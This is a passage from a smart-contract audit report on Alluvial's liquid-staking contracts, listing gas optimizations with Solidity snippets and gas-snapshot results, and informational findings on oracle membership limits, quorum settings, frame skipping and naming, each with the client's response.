freeMemPtr := add(freeMemPtr, 0x20) // _b[32:64) let endChunk := mload(add(_b, 0x40)) // shift value equals the amount needed to pad `_b` to a multiple of 0x20 let shiftValue := sub(0x40, mload(_b)) // mask the padded part endChunk := shl(shiftValue, shr(shiftValue, endChunk)) // store padded end of `_b` mstore(freeMemPtr, endChunk) // advance free memory pointer freeMemPtr := add(freeMemPtr, 0x20) // update the value at the free memory pointer slot mstore(0x40, freeMemPtr) } } And a snapshot of gas savings: 37 testInitWithZeroAddressValue() (gas: -33876 (-0.013%)) testUserDepositsOperatorWithStoppedValiadtors() (gas: -45518 (-0.021%)) testUserDepositsForAnotherUser() (gas: -51602 (-0.022%)) testDeniedUser() (gas: -51602 (-0.022%)) testELFeeRecipientPullFunds() (gas: -51602 (-0.022%)) testUserDeposits() (gas: -51602 (-0.022%)) testNoELFeeRecipient() (gas: -51602 (-0.022%)) testUserDepositsTenPercentFee() (gas: -51602 (-0.022%)) testUserDepositsUnconventionalDeposits() (gas: -52084 (-0.022%)) testUserDepositsFullAllowance() (gas: -51602 (-0.022%)) testValidatorsPenaltiesEqualToExecLayerFees() (gas: -51602 (-0.023%)) testValidatorsPenalties() (gas: -51602 (-0.023%)) testDepositTwentyValidators() (gas: -15178 (-0.027%)) testDepositTenValidators() (gas: -15178 (-0.027%)) Overall gas change: -626252 (-0.311%) The assert statement can also be changed to include strict inequalities to further save gas: -assert(_b.length >= 32 && _b.length <= 64) +assert(_b.length > 31 && _b.length < 65) It would be best to define constants for the literals in the implementation for better readability. Alluvial: Resolved by SPEARBIT/6 since it has been removed from the code base. Spearbit: Acknowledged. +6.5.9 Cache r.value.length used in a loop condition to avoid reading from the storage multiple times. Severity: Gas Optimization Context: Operators.sol#L167, Operators.sol#L181, Operators.sol#L207, Operators.sol#L221 Description: In a loop like the one below, consider caching r.value.length value to avoid reading from storage on every round of the loop. for (uint256 idx = 0; idx < r.value.length;) { Recommendation: Consider implementing the code below. uint256 idx; uint256 length = r.value.length; for (; idx < length;) { Alluvial: Resolved in SPEARBIT/14. Spearbit: Acknowledged. 38 +6.5.10 Cache the r.value.length - 1 value to avoid reading from the storage multiple times. Severity: Gas Optimization Context: Operators.sol#L261-L264 Description/Recommendation: We can cache the r.value.length - 1 value to avoid reading from the storage twice and also doing the same arithmetic operation twice. testExecutorCanSetOperatorLimit() (gas: -156 (-0.000%)) testGovernorCanSetOperatorLimit() (gas: -156 (-0.000%)) testMakingFunctionGovernorOnly() (gas: -156 (-0.001%)) testRandomCallerCannotSetOperatorLimit() (gas: -156 (-0.001%)) testRandomCallerCannotSetOperatorStatus() (gas: -156 (-0.001%)) testRandomCallerCannotSetOperatorStoppedValidatorCount() (gas: -156 (-0.001%)) testExecutorCanSetOperatorStoppedValidatorCount() (gas: -156 (-0.001%)) testGovernorCanSetOperatorStatus() (gas: -156 (-0.001%)) testGovernorCanSetOperatorStoppedValidatorCount() (gas: -156 (-0.001%)) testGovernorCanAddOperator() (gas: -156 (-0.001%)) testExecutorCanSetOperatorStatus() (gas: -156 (-0.001%)) Overall gas change: -1716 (-0.007%) if (!opExists) { r.value.push(newValue); uint256 index = r.value.length - 1; _setOperatorIndex(name, newValue.active, index); return index; Alluvial: Issue does not exist anymore given that the referenced code has been removed in SPEARBIT/14. Spearbit: Acknowledged. +6.5.11 Caching activeCount in Operators.sol::getAllActive/getAllFundable to storage to save gas Severity: Gas Optimization Context: Operators.sol#L165-L176, Operators.sol#L205-L216 Description/Recommendation: activeCount can be made into a storage variable that gets updated when an operator becomes active or inactive. This way we can avoid the expensive loops(1, 2) to calculate activeCount on each call to getAllActive() or getAllFundable(). Note that for the loop for getAllFundable(), we need to store a slightly modified version in the storage and call that activeFundableCount. These extra loops are only needed since we need to plugin the count to define the variable below: // getAllActive() Operator[] memory activeOperators = new Operator[](activeCount); // getAllFundable() CachedOperator[] memory activeOperators = new CachedOperator[](activeCount); Alluvial: Acknowledged. 39 +6.5.12 Rewrite the for loop in ValidatorKeys.sol::getKeys to save gas Severity: Gas Optimization Context: ValidatorKeys.sol#L54-L60 Description: Recommendation: We can rewrite the for loop in ValidatorKeys.sol::getKeys to move/cache some variables around to save gas. testUserDepositsOperatorWithStoppedValiadtors() (gas: -3614 (-0.002%)) testUserDepositsForAnotherUser() (gas: -4078 (-0.002%)) testDeniedUser() (gas: -4078 (-0.002%)) testELFeeRecipientPullFunds() (gas: -4078 (-0.002%)) testUserDeposits() (gas: -4078 (-0.002%)) testNoELFeeRecipient() (gas: -4078 (-0.002%)) testUserDepositsTenPercentFee() (gas: -4078 (-0.002%)) testUserDepositsFullAllowance() (gas: -4078 (-0.002%)) testUserDepositsUnconventionalDeposits() (gas: -4145 (-0.002%)) testValidatorsPenaltiesEqualToExecLayerFees() (gas: -4078 (-0.002%)) testValidatorsPenalties() (gas: -4078 (-0.002%)) Overall gas change: -44461 (-0.019%) uint256 idx; for (; idx < amount;) { bytes memory rawCredentials = r.value[operatorIndex][idx + startIdx]; publicKey[idx] = BytesLib.slice(rawCredentials, 0, PUBLIC_KEY_LENGTH); signatures[idx] = BytesLib.slice(rawCredentials, PUBLIC_KEY_LENGTH, SIGNATURE_LENGTH); unchecked { ++idx; } } Alluvial: Resolved in SPEARBIT/24. Spearbit: Acknowledged. +6.5.13 Operators.get in _getNextValidatorsFromActiveOperators can be replaced by Opera- tors.getByIndex to avoid extra operations/gas. Severity: Gas Optimization Context: OperatorsRegistry.1.sol#L436 Description: Operators.get in _getNextValidatorsFromActiveOperators performs multiple checks that have been done before when Operators.getAllFundable() was called. This includes finding the index, and checking if OperatorResolution.active is set. These are all not necessary. Recommendation: Replace Line 436 in _getNextValidatorsFromActiveOperators with: Operators.Operator storage operator = Operators.getByIndex(operators[selectedOperatorIndex].index); 40 testRemoveValidatorsAsOperator(bytes32,uint256,uint256) (gas: -2 (-0.000%)) testRemoveValidatorsAsAdmin(bytes32,uint256,uint256) (gas: -7 (-0.000%)) testBalanceOfEditsMultiBurnsMultiUserAndRebase(uint256,uint256) (gas: 2 (0.000%)) testBalanceOfEdits(uint256,uint32) (gas: 2 (0.000%)) testTotalSupplyEdits(uint256,uint32) (gas: 2 (0.000%)) testBurnWrappedTokensInvalidTransfer(uint256,uint32) (gas: 2 (0.000%)) testTotalSupplyEditsMultiBurnsAndRebase(uint256) (gas: -5 (-0.000%)) testBurnWrappedTokens(uint256,uint32) (gas: 8 (0.000%)) testTransferFrom(uint256,uint256,uint256,uint32) (gas: 29 (0.000%)) testTransfer(uint256,uint256,uint32) (gas: -24 (-0.000%)) testGetKeysAsRiver(bytes32,uint256,uint256) (gas: -922 (-0.001%)) testGetKeysAsRiverLimitTest(bytes32,uint256,uint256) (gas: -922 (-0.001%)) testUserDepositsForAnotherUser() (gas: -1872 (-0.001%)) testDeniedUser() (gas: -1872 (-0.001%)) testELFeeRecipientPullFunds() (gas: -1872 (-0.001%)) testUserDeposits() (gas: -1872 (-0.001%)) testNoELFeeRecipient() (gas: -1872 (-0.001%)) testUserDepositsTenPercentFee() (gas: -1872 (-0.001%)) testUserDepositsFullAllowance() (gas: -1872 (-0.001%)) testValidatorsPenaltiesEqualToExecLayerFees() (gas: -1872 (-0.001%)) testValidatorsPenalties() (gas: -1872 (-0.001%)) testRiverFuzzing(uint96,uint96,uint32) (gas: -1872 (-0.001%)) testUserDepositsOperatorWithStoppedValiadtors() (gas: -1872 (-0.001%)) testUserDepositsUnconventionalDeposits() (gas: -2808 (-0.001%)) testBreakingLowerBoundLimit(uint64,uint64,uint32) (gas: -19196 (-0.078%)) Overall gas change: -44433 (-0.090%) Also note, if we apply this change, we can go further and cache operators[selectedOperatorIndex].index's value since it has also been used in theif/else block immediately after it. Alluvial: Recommendation implemented in SPEARBIT/14. Spearbit: Acknowledged. +6.5.14 Avoid unnecessary equality checks with true in if statements Severity: Gas Optimization Context: OperatorsRegistry.1.sol#L197 Description: Statements of the type if( condition == true) can be replaced with if(condition). The extra comparison with true is redundant. Recommendation: So Line 197 in OperatorsRegistry can be changed to: if (Operators.exists(_newName)) { Alluvial: We completely removed the name unicity and are now working entirely with indexes as unique identifiers. Names are considered as informational off chain data now. Check has been removed in SPEARBIT/14. Spearbit: Acknowledged. 41 +6.5.15 Rewrite OperatorRegistry.getOperatorDetails to save gas Severity: Gas Optimization Context: OperatorsRegistry.1.sol#L130 Description: In getOperatorDetails the 1st line is: _index = Operators.indexOf(_name); Since we already have the _index from this line we can use that along with getByIndex to retrieve the _opera- torAddress. This would reduce the gas cost significantly, since Operators.get(_name) calls Operators._getOp- eratorIndex(name) to find the _index again. testExecutorCanSetOperatorLimit() (gas: -1086 (-0.001%)) testGovernorCanSetOperatorLimit() (gas: -1086 (-0.001%)) testUserDepositsForAnotherUser() (gas: -2172 (-0.001%)) testDeniedUser() (gas: -2172 (-0.001%)) testELFeeRecipientPullFunds() (gas: -2172 (-0.001%)) testUserDepositsUnconventionalDeposits() (gas: -2172 (-0.001%)) testUserDeposits() (gas: -2172 (-0.001%)) testNoELFeeRecipient() (gas: -2172 (-0.001%)) testUserDepositsTenPercentFee() (gas: -2172 (-0.001%)) testUserDepositsFullAllowance() (gas: -2172 (-0.001%)) testValidatorsPenaltiesEqualToExecLayerFees() (gas: -2172 (-0.001%)) testValidatorsPenalties() (gas: -2172 (-0.001%)) testUserDepositsOperatorWithStoppedValiadtors() (gas: -3258 (-0.002%)) testMakingFunctionGovernorOnly() (gas: -1086 (-0.005%)) testRandomCallerCannotSetOperatorLimit() (gas: -1086 (-0.005%)) testRandomCallerCannotSetOperatorStatus() (gas: -1086 (-0.005%)) testRandomCallerCannotSetOperatorStoppedValidatorCount() (gas: -1086 (-0.005%)) testExecutorCanSetOperatorStoppedValidatorCount() (gas: -1086 (-0.006%)) testGovernorCanSetOperatorStatus() (gas: -1086 (-0.006%)) testGovernorCanSetOperatorStoppedValidatorCount() (gas: -1086 (-0.006%)) testGovernorCanAddOperator() (gas: -1086 (-0.006%)) testExecutorCanSetOperatorStatus() (gas: -1086 (-0.006%)) Overall gas change: -36924 (-0.062%) Also note, when the operator is not OperatorResolution.active, _index becomes -1 in both cases. With the change suggested if _index is -1, uint256(_index) == type(uint256).max which would cause getByIndex to revert with OperatorNotFoundAtIndex(index). But with the current code, it will revert with an index out-of-bound type of error. _operatorAddress = Operators.getByIndex(uint256(_index)).operator; Recommendation: Consider implementing the following change. - _operatorAddress = Operators.get(_name).operator; + _operatorAddress = Operators.getByIndex(uint256(_index)).operator; Alluvial: Issue does not exist anymore given that the referenced code has been removed by PR SPEARBIT/14. Spearbit: Acknowledged. 42 +6.5.16 Rewrite/simplify OracleV1.isMember to save gas. Severity: Gas Optimization Context: Oracle.1.sol#L189-L200 Description: OracleV1.isMember can be simplified to save gas. Recommendation: Rewrite isMember. function isMember(address _memberAddress) external view returns (bool) { return OracleMembers.indexOf(_memberAddress) >= 0 } testRemoveValidatorsAsOperator(bytes32,uint256,uint256) (gas: -21 (-0.000%)) testRemoveValidatorsAsAdmin(bytes32,uint256,uint256) (gas: -22 (-0.000%)) testBalanceOfEdits(uint256,uint32) (gas: 2 (0.000%)) testBurnWrappedTokensWithRebase(uint256,uint32) (gas: -2 (-0.000%)) testTotalSupplyEdits(uint256,uint32) (gas: 2 (0.000%)) testBurnWrappedTokensInvalidTransfer(uint256,uint32) (gas: -2 (-0.000%)) testBurnWrappedTokens(uint256,uint32) (gas: 3 (0.000%)) testTransfer(uint256,uint256,uint32) (gas: -5 (-0.000%)) testTransferFrom(uint256,uint256,uint256,uint32) (gas: 12 (0.000%)) testBalanceOfEditsMultiBurnsMultiUserAndRebase(uint256,uint256) (gas: 21 (0.000%)) testBalanceOfEditsMultiBurnsAndRebase(uint256) (gas: -24 (-0.000%)) testTotalSupplyEditsMultiBurnsAndRebase(uint256) (gas: -36 (-0.000%)) testRandomCallerCannotRemoveMember() (gas: -121 (-0.001%)) testExecutorCanAddMember() (gas: -121 (-0.002%)) testGovernorCanAddMember() (gas: -121 (-0.002%)) testRemoveMemberUnauthorized(uint256) (gas: -233 (-0.002%)) testAddMember(uint256) (gas: -233 (-0.002%)) testRemoveMember(uint256) (gas: -288 (-0.003%)) testExecutorCanRemoveMember() (gas: -187 (-0.003%)) testGovernorCanRemoveMember() (gas: -187 (-0.003%)) Overall gas change: -1563 (-0.017%) Alluvial: Recommendation implemented in SPEARBIT/20. Spearbit: Acknowledged. +6.5.17 Cache beaconSpec.secondsPerSlot * beaconSpec.slotsPerEpoch multiplication in to save gas. Severity: Gas Optimization Context: Oracle.1.sol#L167-L168 Description: The calculation for _startTime and _endTime uses more multiplication than is necessary. Recommendation: Cache the multiplcation in beaconSpec.secondsPerSlot * beaconSpec.slotsPerEpoch to save gas. uint256 secondsPerEpoch = beaconSpec.secondsPerSlot * beaconSpec.slotsPerEpoch; _startTime = beaconSpec.genesisTime + _startEpochId * secondsPerEpoch; _endTime = _startTime + secondsPerEpoch * beaconSpec.epochsPerFrame - 1; 43 testRemoveValidatorsAsOperator(bytes32,uint256,uint256) (gas: -2 (-0.000%)) testBalanceOfEdits(uint256,uint32) (gas: 2 (0.000%)) testBurnWrappedTokensWithRebase(uint256,uint32) (gas: -2 (-0.000%)) testTotalSupplyEdits(uint256,uint32) (gas: 2 (0.000%)) testBurnWrappedTokensInvalidTransfer(uint256,uint32) (gas: -2 (-0.000%)) testBurnWrappedTokens(uint256,uint32) (gas: 3 (0.000%)) testBalanceOfEditsMultiBurnsAndRebase(uint256) (gas: -5 (-0.000%)) testTransferFrom(uint256,uint256,uint256,uint32) (gas: 10 (0.000%)) testRemoveMember(uint256) (gas: -7 (-0.000%)) testTotalSupplyEditsMultiBurnsAndRebase(uint256) (gas: -17 (-0.000%)) testUserDepositsForAnotherUser() (gas: -166 (-0.000%)) testDeniedUser() (gas: -166 (-0.000%)) testELFeeRecipientPullFunds() (gas: -166 (-0.000%)) testUserDepositsUnconventionalDeposits() (gas: -166 (-0.000%)) testUserDeposits() (gas: -166 (-0.000%)) testNoELFeeRecipient() (gas: -166 (-0.000%)) testUserDepositsTenPercentFee() (gas: -166 (-0.000%)) testUserDepositsFullAllowance() (gas: -166 (-0.000%)) testValidatorsPenaltiesEqualToExecLayerFees() (gas: -166 (-0.000%)) testValidatorsPenalties() (gas: -166 (-0.000%)) testRiverFuzzing(uint96,uint96,uint32) (gas: -166 (-0.000%)) testUserDepositsOperatorWithStoppedValiadtors() (gas: -166 (-0.000%)) testTransfer(uint256,uint256,uint32) (gas: -24 (-0.000%)) Overall gas change: -2034 (-0.001%) Alluvial: Recommendation implemented in SPEARBIT/20. Spearbit: Acknowledged. +6.5.18 Avoid to waste gas distributing rewards when the number of shares to be distributed is zero Severity: Gas Optimization Context: River.1.sol#L263-L280 Description: _onEarnings calculate and distribute shares to both operators and treasury. During the Audit, the Client stated that both GlobalFee and OperatorRewardsShare, used to calculate the number of shares to be distributed to operators and treasury, could range from 0 to BASE. This mean that there are scenarios where: • sharesToMint could be 0 (total number of shares to be distributed to operators and treasury). • operatorRewards could be 0 (number of shares to be distributed to operators). • sharesToMint - mintedRewards could be 0 (number of shares to be distributed to treasury). In those scenarios, all the gas spent in calculation and event emitted by calling _mintRawShares could be avoided. Note: if GlobalFee or OperatorRewardsShare is 0 the number of shares distributed to the operators as a reward for providing the validators infrastructure would be zero. Alluvial: The whole operator rewarding system has been removed in SPEARBIT/8. Now shares are distributed to the treasury only if sharesToMint > 0. Spearbit: Acknowledged. 44 +6.5.19 _rewardOperators could save gas by skipping operators with no active and funded validators Severity: Gas Optimization Context: River.1.sol#L219-L248 Description: _rewardOperators is the River function that distribute the earning rewards to each active operator based on the amount of active validators. The function iterate over the list of active operators returned by OperatorsRegistryV1.listActiveOperators calculating the total amount of active and funded validators (funded-stopped) and the number of active and funded validators (funded-stopped) for each operator. Because of current code, the final temporary array validatorCounts could have some item that contains 0 if the operator in the index position had no more active validators. This mean that: 1) gas has been wasted during the loop 2) gas will be wasted in the second loop, distributing 0 shares to an operator without active and funded valida- tors 3) _mintRawShares will be executed without minting any shares but emitting a Transfer event Recommendation: Consider making listActiveOperators return only operators that have at least one active and funded validator (funded-stopped>0). Consider also preventing to call _mintRawShares if the number of shares to be minted is 0. Alluvial: The whole operator rewarding system has been removed in SPEARBIT/8. Spearbit: Acknowledged. 6.6 Informational +6.6.1 Consider adding a strict check to prevent Oracle admin to add more than 256 members Severity: Informational Context: Oracle.1.sol#L202-L211, OracleMembers.sol#L23-L33 Description: At the time of writing this issue in the latest commit at 030b52feb5af2dd2ad23da0d512c5b0e55eb8259, in the natspec docs of OracleMembers there is a @dev comment that says @dev There can only be up to 256 oracle members. This is due to how report statuses are stored in Reports Positions If we look at ReportsPositions.sol the natspec docs explains that Each bit in the stored uint256 value tells if the member at a given index has reported But both Oracle.addMember and OracleMembers.push do not prevent the admin to add more than 256 items to the list of oracle members. If we look at the result of the test (located in Appendix), we can see that: • It's possible to add more than 256 oracle members. • The result of oracle.getMemberReportStatus(oracleMember257) return true even if the oracle member has not reported yet. • Because of that, oracle.reportConsensusLayerData (executed by oracleMember257) reverts correctly. • If we remove a member from the list (for example oracle member with index 1) the oracleMember257 it will be able to vote because will be swapped with the removed member and at oracle.getMemberReportStatus(oracleMember257) return false. this point 45 Recommendation: Consider adding a strict check inside Oracle.addMember that prevents the Oracle admin to add more than 256 oracle members. Alluvial: This issue has been acknowledged as we would never have such a big oracle member count and if we ever need it we would update the Oracle contract to make the report voting scalable above 256. +6.6.2 ApprovalsPerOwner.set does not check if owner or spender is address(0). Severity: Informational Context: ApprovalsPerOwner.sol#L24-L34 Description: When ApprovalsPerOwner value is set for an owner and a spender, the addresses of the owner and the spender are not checked against address(0). Recommendation: Add checks for owner and spender to make sure they are not passed as the zero address by mistake. Other libraries like OpenZepplin have a similar check. Alluvial: The following PR has introduced checks for the mentioned addresses that are fed to ApprovalsPerOwner. So although the checks are not inside the library, they have been applied before using the library's setter function. Spearbit: Acknowledged. +6.6.3 Quorum could be higher than the number of oracles, DOSing the Oracle contract Severity: Informational Context: Oracle.1.sol#L257-L282 Description: The current implementation of Oracle.setQuorum only checks if the _newQuorum input parameter is not 0 or equal to the current quorum value. By setting a quorum higher than the number of oracle members, no quorum could be reached for the current or future slots. Recommendation: Consider adding a check that revert the transaction if the value of _newQuorum is greater than the number of oracle members. Alluvial: Recommendation implemented in PR SPEARBIT/15. Spearbit: Acknowledged. One important thing to remember is that when the other PR about removeMember is merged with this, the part that resets everything about report for the epoch must be done before _setQuorum otherwise the function will push a quorum that includes the report from the user that will be deleted. Alluvial: Acknowledged. +6.6.4 ConsensusLayerDepositManager.depositToConsensusLayer should be called only after a quorum has been reached to avoid rewarding validators that have not performed during the frame Severity: Informational Context: ConsensusLayerDepositManager.1.sol#L50 Description: Alluvial is not tracking timestamps or additional information of some actions that happen on-chain like • when operator validator is funded on the beacon chain. • when an operator is added. • when validators are added or removed. • when a quorum is reached. • when rewards/penalties/slashes happen and which validator is involved. • and so on... 46 By not having these enriched informations it could happen that validators that have not contributed to a frame will still get rewards and this could be not fair to other validators that have contributed to the overall balance by working and bringing rewards. Let's make an example: we have 10 operators with 1k validators each at the start of a frame. At some point during the very end of the frame validato_10 get approved 9k validators and all of them get funded. Those validators only participated a small fraction in the production of the rewards. But because there's no way to track these timing and because oracles do not know anything about these (they just need to report the balance and the number of validators during the frame) they will report and arrive to a quorum of reportBeacon(correctEpoch, correctAmountOfBalance, 21_000) that will trigger the OracleManagerV1.setBeaconData. The contract check that 21_000 > DepositedValidatorCount.get() will pass and _onEarnings is called. Let's not consider the math involved in the process of calculating the number of shares to be distributed based on the staked balance delta, let's say that because of all the increase in capital Alluvial will call _rewardOperators(1_- 000_000); distributing 1_000_000 shares to operators based on the number of validators that produced that reward. Because as we said we do not know how much each validator has contributed, those shares will be contributed in the same way to operators that could have not contributed at all to the epoch. This is true for both scenarios where validators that have joined or exited the beacon chain not at the start of the epoch where the last quorum was set. Recommendation: If adding these informations and the logic to better track these behaviors on chain is problem- atic, consider at least documenting all these possible scenarios to let each actor in Alluvial be aware of them. Alluvial: The whole operator rewarding system has been removed in PR SPEARBIT/8. There's going to be a contract receiving the rewards (treasury) from which we'll pay the operators. To begin with, we'll probably not do a performance-based distribution to keep it simple but this is something we can add in the future as the rewards are computed off-chain. Spearbit: Acknowledged. +6.6.5 Document the decision to include executionLayerFees in the logic to trigger _onEarnings to dis- tribute rewards to Operators and Treasury Severity: Informational Context: OracleManager.1.sol#L40-L68 Description: The setBeaconData function from OracleManager contract is called when oracle members have reached a quorum. The function after checking that the report data respects some integrity check performs a check to distribute rewards to operators and treasury if needed: uint256 executionLayerFees = _pullELFees(); if (previousValidatorBalanceSum < _validatorBalanceSum + executionLayerFees) { _onEarnings((_validatorBalanceSum + executionLayerFees) - previousValidatorBalanceSum); } The delta between _validatorBalanceSum and previousValidatorBalanceSum is the sum of all the rewards, penalties and slashes that validators have accumulated during the validation work of one or multiple frames. By adding executionLayerFees to the check, it means that even if the validators have performed poorly (the sum of rewards is less than the sum of penalties+slash) they could still get rewards if executionLayerFees is greater than the negative delta of newSum-prevSum. If we look at the natspec of the _onEarnings it seems that only the validator's balance (without fees) should be used in the if check. 47 /// @notice Handler called if the delta between the last and new validator balance sum is positive /// @dev Must be overriden /// @param _profits The positive increase in the validator balance sum (staking rewards) function _onEarnings(uint256 _profits) internal virtual; Recommendation: If the current logic is correct, consider updating the natspec comments and further explain the logic and the decisions made to remove any possible doubts. Alluvial: The whole operator rewarding system has been removed by PR SPEARBIT/8. Alluvial statement regarding using executionLayerFees in the _onEarnings trigger check: The whole pro- cess has been revamped by adding a maximum amount that we can pull. Basically, the Oracle will compute the maximum allowed increase in balance and give that to the River contract that will be able to pull funds up to the allowed limit. The flow will be documented in the doc PR, but basically we consider el fees as a core revenue stream on which operators and the treasury can take a fee. Spearbit: Acknowledged. +6.6.6 Consider documenting how and if funds from the execution layer fee recipient are considered inside the annualAprUpperBound and relativeLowerBound boundaries. Severity: Informational Context: BeaconReportBounds.sol#L6-L9, Oracle.1.sol#L423-L451, Oracle.1.sol#L468-L475 Description: When oracle members reach a quorum, the _pushToRiver function is called. Alluvial is performing some sanity check to prevent malicious oracle member to report malicious beacon data. Inside the function, uint256 prevTotalEth = IRiverV1(payable(address(riverAddress))).totalUnderlyingSupply(); riverAddress.setBeaconData(_validatorCount, _balanceSum, bytes32(_epochId)); uint256 postTotalEth = IRiverV1(payable(address(riverAddress))).totalUnderlyingSupply(); uint256 timeElapsed = (_epochId - LastEpochId.get()) * _beaconSpec.slotsPerEpoch * _beaconSpec.secondsPerSlot; ,! _sanityChecks(postTotalEth, prevTotalEth, timeElapsed); function _sanityChecks(uint256 _postTotalEth, uint256 _prevTotalEth, uint256 _timeElapsed) internal ,! view { if (_postTotalEth >= _prevTotalEth) { uint256 annualAprUpperBound = BeaconReportBounds.get().annualAprUpperBound; if ( uint256(10000 * 365 days) * (_postTotalEth - _prevTotalEth) > annualAprUpperBound * _prevTotalEth * _timeElapsed ) { revert BeaconBalanceIncreaseOutOfBounds(_prevTotalEth, _postTotalEth, _timeElapsed, ,! annualAprUpperBound); } } else { uint256 relativeLowerBound = BeaconReportBounds.get().relativeLowerBound; if (uint256(10000) * (_prevTotalEth - _postTotalEth) > relativeLowerBound * _prevTotalEth) { revert BeaconBalanceDecreaseOutOfBounds(_prevTotalEth, _postTotalEth, _timeElapsed, relativeLowerBound); } ,! } } Both prevTotalEth and postTotalEth call SharesManager.totalUnderlyingSupply() that returns the value from Inside those balance is also included the amount of fees that are pulled from the River._assetBalance(). ELFeeRecipient (Execution Layer Fee Recipient). Alluvial should document how and if funds from the execution layer fee recipient are also considered inside the annualAprUpperBound and relativeLowerBound boundaries. 48 Recommendation: Consider documenting how and if funds from the execution layer fee recipient are considered inside the annualAprUpperBound and relativeLowerBound boundaries. Alluvial: Acknowledged. +6.6.7 Allowlist.allow allows arbitrary values for _statuses input Severity: Informational Context: Allowlist.1.sol#L46-L70 Description: The current implementation of allow does not check if the value inside each _statuses item is a valid value or not. The function can be called by both the administrator or the allower (roles authorized to manage the user permissions) that can specify arbitrary values to be assigned to the corresponding _accounts item. The user's permissions handled by Allowlist are then used by the River contract in different parts of the code. Those permissions inside the River contracts are a limited set of permissions that could not match what the allower /admin of the Allowlist has used to update a user's permission when the allow function was called. Recommendation: Consider documenting which pool of values can be assigned to _statuses items based on the checks done by the contracts that use Allowlist contract. Otherwise, consider implementing a way to store "allowed" permission masks to be assigned to _statuses and enforce an equality check inside the allow loop. Alluvial: Acknowledged. +6.6.8 Consider exploring a way to update the withdrawal credentials and document all the possible scenarios Severity: Informational Context: Description: The withdrawal credentials is currently set when River.initRiverV1 is called. The func- tion will internally call ConsensusLayerDepositManager.initConsensusLayerDepositManagerV1 that will perform WithdrawalCredentials.set(_withdrawalCredentials); After initializing the withdrawal credentials, there's no way to update it and change it. The withdrawal cre- dentials is a key part of the whole protocol and everything that concern it should be well documented including all the worst-case scenario • What if the withdrawal credentials is lost? • What if the withdrawal credentials is compromised? • What if the withdrawal credentials must be changed (lost, compromised or simply the wrong one has been submitted)? What should be implemented inside the Alluvial logic to use the new withdrawal creden- tials for the operator's validators that have not been funded yet (the old withdrawal credentials has not been sent to the Deposit contract)? Note that currently there's seem to be no way to update the withdrawal credentials for a validator already submitted to the Deposit contract. Recommendation: • Consider documenting how Alluvial would handle all the scenarios where the withdrawal credentials have to be updated. • Consider documenting how Alluvial plan to safeguard the withdrawal credentials. • Consider implementing a logic that allow Alluvial to update the withdrawal credentials on a time basis or after X amount of ETH has been staked to reduce the funds lost in case the key is lost or key/contract is compromised. Alluvial: Acknowledged. 49 +6.6.9 Oracle contract allows members to skip frames and report them (even if they are past) one by one or all at once Severity: Informational Context: Oracle.1.sol#L284-L334 Description: The current implementation of reportBeacon allows oracle members to skip frames (255 epochs) and report them (even if they are past) one by one or all at once. Let's assume that members arrived to a quorum for epochId_X. When quorum is reached, _pushToRiver is called, and it will update the following properties: • clean all the storage used for member reporting. • set ExpectedEpochId to epochId_X + 255. • set LastEpochId to epochId_X. With this context, let's assume that members decide to wait 30 frames (30 days) or that for 30 days they cannot arrive at quorum. At the new time, the new epoch would be epochId_X + 255 * 30 The following scenarios can happen: • 1) Report at once all the missed epochs Instead of reporting only the current epoch (epochId_X + 255 * 30), they will report all the previous "skipped" epochs that are in the past. In this scenario, ExpectedEpochId contains the number of the expected next epoch assigned 30 days ago from the previous call to _pushToRiver. In reportBeacon if the _epochId is what the system expect (equal to Expect- edEpochId) the report can go on. So to be able to report all the missing reports of the "skipped" frames the member just need to call in a se- quence reportBeacon(epochId_X + 255, ...), reportBeacon(epochId_X + 255 + 255, ...) + .... + report- Beacon(epochId_X + 255 * 30, ...) • 2) Report only the last epoch In this scenario, they would call directly reportBeacon(epochId_X + 255 * 30, ...). _pushToRiver call _sani- tyChecks to perform some checks as do not allow changes in the amount of staked ether that are below or above some bounds. The call that would be made is _sanityChecks(oracleReportedStakedBalance, prevTotalEth, timeElapsed) where timeElapsed is calculated as uint256 timeElapsed = (_epochId - LastEpochId.get()) * _beacon- Spec.slotsPerEpoch * _beaconSpec.secondsPerSlot; So, time elapsed is the number of seconds between the reported epoch and the LastEpochId. But in this scenario, LastEpochId has the old value from the previous call to _pushToRiver made 30 days ago that will be epochId_X. Because of this, the check made inside _sanityChecks for the upper bound would be more relaxed, allowing a wider spread between oracleReportedStakedBalance and prevTotalEth Recommendation: Consider documenting these possible behaviors or implement a logic that prevents oracle members to call reportBeacon for past epochs (relative to the real-time beacon epoch). Alluvial: Acknowledged. 50 +6.6.10 Consider renaming OperatorResolution.active to a more meaningful name Severity: Informational Context: Operators.sol#L35 Description: The name active in the struct OperatorResolution could be misleading because it can be confused with the fact that an operator (the struct containing the real operator information is Operator ) is active or not. The value of OperatorResolution.active does not represent if an operator is active, but is used to know if the index associated to the struct's item (OperatorResolution.index) is used or not. Recommendation: Consider renaming to something more meaningful for the usage done in the code and to distinguish it from the operator's active state. Alluvial: Issue does not exist anymore given that the referenced code has been removed in PR SPEARBIT/14. Spearbit: Acknowledged. +6.6.11 lsETH and WlsETH's name() functions return inconsistent name. Severity: Informational Context: WLSETH.1.sol#L49, SharesManager.1.sol#L53 Description: lsETH.name() is River Ether, while WlsETH.name() is Wrapped Alluvial Ether. Recommendation: Perhaps either River or Alluvial would need to be replaced by the other. Alluvial: Recommendation implemented in SPEARBIT/18. Spearbit: Acknowledged. +6.6.12 Rename modifiers to have consistent naming and patterns only. Severity: Informational Context: Firewall.sol#L42-L48, Firewall.sol#L50-L56 Description: The modifiers ifGovernor and ifGovernorOrExecutor in Firewall.sol have a different naming conventions and also logical patterns. Recommendation: We can rename and also modify their logic to follow the rest of the similar modifiers in the codebase: modifier onlyGovernor() { // <--- ifGovernor if (msg.sender != governor) { revert Errors.Unauthorized(msg.sender); } _; } modifier onlyGovernorOrExecutor() { // <--- ifGovernorOrExecutor if (msg.sender != governor && msg.sender != executor) { revert Errors.Unauthorized(msg.sender); } _; } Alluvial: Recommendation implemented in SPEARBIT/30. Spearbit: Acknowledged. 51 +6.6.13 OperatorResolution.active might be a redundant struct field which can be removed. Severity: Informational Context: Operators.sol#L35 Description: The value of active stays true once it has been set true for a given index. This is especially true since the only call to Operators.set is from OperatorsRegistryV1.addOperator which does not override values for already registered names. Recommendation: The updates to this value is almost synced with the same value as the updates to Opera- tor.active except at Operators.setOperatorName (which the unsynched nature at setOperatorName might be a mistake). So maybe these 2 parameters are meant to be the same. If so, perhaps we should remove it from either here or from Operator struct. Alluvial: This active value is not named properly, it's just here to signal that the index is used. This struct should be replaced by an uint256 that stores index + 1 so we know that if value > 0 then the name is assigned, and we can return value - 1 to retrieve the 